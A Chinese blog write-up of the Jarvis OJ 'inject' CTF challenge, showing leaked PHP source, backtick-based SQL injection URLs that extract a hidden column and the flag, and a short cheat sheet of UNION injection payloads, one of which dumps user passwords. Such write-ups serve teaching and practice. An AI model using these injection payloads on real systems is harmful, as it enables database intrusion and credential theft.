Jarvis OJ inject(反引号注入)

最新推荐文章于 2022-04-29 14:57:38 发布
最新推荐文章于 2022-04-29 14:57:38 发布
阅读量846 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42348709/article/details/87881200
版权

新博客:https://wywwzjj.top/

http://web.jarvisoj.com:32794/index.php~
得到源码

<?php
    require("config.php");
    $table = $_GET['table']?$_GET['table']:"test";
    $table = Filter($table);
    mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
    $sql = "select 'flag{xxx}' from secret_{$table}";
    $ret = sql_query($sql);
    echo $ret[0];
?>

?table=flag 正常响应
=> 存在 secret_flag 表
注意到这个反引号 ``,其作用是区分 MySQL 保留字与普通字符

本地尝试

create table desc  # 报错
create table `desc`  # 能成功执行

desc `abc` `def`
desc abc def 
# 效果是一样的

结合题目 => desc `secret_flag` `
(注意空格,此处如果是 desc `secret_flag`` 将被认为是执行 desc secret_flag`)

顺手执行

?table=flag`%20`%20union%20select%201

发现还是没有变化,依旧显示 flag{xxx}
不要灰心,这只显示了一条数据而已,加入 limit 试试

?table=flag`%20`%20union%20select%201%20limit%201,1

=> 1

查询字段

?table=flag`%20`%20union%20select%20group_concat(column_name)%20from%20information_schema.columns%20
where%20table_name=0x7365637265745f666c6167%20limit%201,1

=> flagUwillNeverKnow
(此处 table_name 的值要进行 hex 编码)

查询数据

?table=flag`%20`%20union%20select%20flagUwillNeverKnow%20from%20secret_flag%20limit%201,1

=> flag

PS:也可以不用 limit,直接 where 0,使得前面的查询为空,则直接显示我们的数据
如 ?table=flag%20%20where%200%20union%20select%20flagUwillNeverKnow%20from%20secret_flag

补充知识

information_schema 存储数据库信息的数据库

数据库名

schemata => schema_name

tables => table_schema

columns => table_schema

表名

tables => table_name

columns => table_name

列名

columns => columns_name

-- 获取当前数据库中所有表
select 1,group_concat(table_name) from information_schema.tables where table_schema=database() 

-- 获得所有列名(字段),flag 要hex编码 0x666c6167
select 1,group_concat(column_name) from information_schema.columns where table_name=flag; 

-- 下载数据
-1or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

-- 获取表中的字段名
-1union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
wywwzjj
关注
专栏目录
Jarvis OJ web(一)
Lemon's blog
10-04 992
前言:总结一下最近做过的jarvisoj的web题,有的很有意思,能学习到很多新知识 LOCALHOST 提示很明显,伪造IP地址即可 抓包进行伪造,即可得出flag Login 一个提交页面,源码中也没有发现什么线索,抓包来看一下 有一句提示 "select * from `admin` where password='".md5($pass,true)."'" 这里就涉及到MD5函数...
Jarvis OJ level1
Kni9hT's Blog
11-08 610
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
Jarvis OJ /inject
沐目的博客
10-15 294
Jarvis OJ /inject 感觉SQL注入挺重要的,也算是比较基础的东西,而且经常写题会遇到。所以就打算每次遇到一些新的东西,或者忘了的东西,就记录一下。也会记录一些数据库的知识,毕竟SQL注入和数据库是分不开的。 一.MySQL数据排序asc、desc 1.asc 这个就是把查询到的数据,从小到大的排列,当然,这也是默认的排解方式。像这个是没有加任何其他东西的查找。 mysql&gt...
jarvisoj Inject & PHPINFO
river
03-26 520
Jarvisoj Inject 扫描后台得到index.php~ <?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $table = Filter($table); mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker(); $sq...
openssh安装_CVE202015778:OpenSSH命令注入漏洞复现
weixin_39577422的博客
12-06 322
上方蓝色字体关注我们,一起学安全!作者:Menge&小泫@Timeline Sec本文字数:1160阅读时长:3~4min声明:请勿用作违法用途,否则后果自负0x01 简介OpenSSH是SSH(SecureSHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, sc...
php万能密码_细说php序列化字符逃逸
weixin_39719427的博客
11-26 190
亲爱的,关注我吧11/5文章共计4381个词预计阅读10分钟来和我一起阅读吧前言php序列化的字符逃逸算是比较难理解的一个知识点,在最近的好几场比赛中都出现了相关的题,于是下定决心彻底理解透彻这个知识点,于是便有了这篇文章。基础知识理解字符逃逸在理解之后就能够明白,这是一种闭合的思想,它类似SQL中的万能密码,理解这种原理之后会变得特别容易。在SQL注入中,我们常用'、"来对注入点进行...
insert 语句_CTF从入门到提升(七)insert 等数据表相关操作注入及例题分享
weixin_39607836的博客
12-01 249
insert语法介绍insert插入到某张表中,后面跟上设置的参数以及值。在insert的时候可以使用哪些注入方法呢?比如这个报错的方法,如果报错可以使用,那么同理其他函数也是可以使用的。首先看下语句使用,如下图:update 语法介绍update 即对整张表做数据更新我们在set 这个位置做一个注入,报错后可以带出数据:delete语法介绍delete即删除表中的数据例如我删除id=7的数据例...
JarvisOJ.docx
03-10
本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ Web 中,我们学习到了如何...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 317
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
Jarvisoj_Simple Injection
一只迂腐子
03-04 1499
Simple Injection - 167 SOLVERS - 350 WEB 很简单的注入,大家试试? 题目入口:http://web.jarvisoj.com:32787/ 题目来源:ISCC2016 访问页面之后,得到就是一个登陆页面。通过burp进行抓包,发现在响应头或者是页面中含有提示信息,那么就说明这的确是一个普通的登陆型的SQL注入漏洞了。 常见的登陆漏洞类型 ...
171219 JarvisOJ(DebugMe)(1)
whklhhhh的博客
12-20 458
1625-5 王子昂 总结《2017年12月19日》 【连续第445天总结】 A. JarvisOJ-DebugMe B. JarvisOJ上的题…真是让人痛苦又快乐着,每题都挺难的,但是又能学到不少东西,但是WP难找真让人头疼OTZ强迫自己学习呀这是拖入IDA编译,发现是Elf的动态链接库 所以动态调试就比较麻烦了(:з」∠)还要自己写个程序加载它main函数很直接,要求有2个参数
JarvisOJ web题目 [61dctf]inject 解题思路----mysql引号与单引号的区别
__Curtain_
04-12 2466
原题:http://web.jarvisoj.com:32794/    给了一条提示先找到源码,几种常见的源码泄露方式都试一边。最后在提交 http://web.jarvisoj.com:32794/index.php~ 发现源码。 &lt;?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $ta...
Jarvis OJ–Login 透过MD5()下的SQL注入学习MD5加密
超人学飞的日子
07-01 409
遇到一道CTF题目:http://web.jarvisoj.com:32772/找到了这个题目最早出现的地方和原理解释:http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes哎,都是8年前的题目了,感觉自己进展好慢。看解释原理也不复杂,就是MD5()函数中参数为true时,输出形式为原始二进制格式,如果,找到一个字符串MD5后得到的原始...
[61dctf]inject
Mikasa
04-19 722
本题考察了Mysql中引号与不同引号的区别。。 提示有源码。。扫描一下: 看见了index.php~,访问一下,就发现: desc table_name 是用来查询表结构的,例如: 如果要成功,就必须保证此表存在。。 我们也看到了后面的源码。。。需要我们构造Payload,可是Payload也会被带入表中查询。。肯定会出错的。。。 这里面就用到了引号的作用。。 简单理解 我们...
渗透测试-xxe之CTF考题实验及防御方法
lza20001103的博客
04-29 1609
xxe之CTF考题实验及防御方法
desc巧用及引号 ` SQL注入——【61dctf】 inject writeup
Ve99tr’s Blog
09-02 1983
题目链接 :http://web.jarvisoj.com:32794/ 描述 进入页面,发现只有 flag{xxx} 题目hint:先找到源码~ 源码泄露 使用后台目录扫描工具御剑进行后台扫描 源码泄露: http://web.jarvisoj.com:32794/index.php~ F12查看器得到泄露的源码 <?php require("config.php"); $ta...
Jarvis-OJ-Web writeup
a370793934的专栏
11-28 1134
PORT51 访问了页面发现让你 Please use port 51 to visit this site. 明显是绑定的端口,不可能用51端口去访问啊,很困惑结果是自己去访问的时候需要用到51端口啊…原来如此,使用curl中的–local-port命令 --local-port <端口号>[-num]设置连接使用的首选端口号或本地端口范围。请注意,端口号是一种稀缺资源,繁忙...
171227 逆向-JarvisOJ(Shell)
whklhhhh的博客
12-28 961
1625-5 王子昂 总结《2017年12月27日》 【连续第453天总结】 A. JarvisOJ-Shell B. 这个64位的upx+golang真是够折腾人的..首先查壳,发现PEiD直接罢工了,我还纳闷儿,明明都能运行了咋还不是有效的PE文件捏 然后ExeInfoPE才告诉我这货是64位文件拖入IDA发现什么都没识别出来 但是通过区段名能看出来是UPX壳然而掏UPX程序出来却
JarvisOJ:实战渗透挑战与信息获取技术
"JarvisOJ 是一个综合性的在线编程竞赛平台,提供了多种挑战环节以测试参赛者的技能。本文将介绍几个关键知识点: 1. JarvisOJ-WEB 部分:该部分强调了平台的安全性,特别是对访问控制的设置。题目要求使用特定端口...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值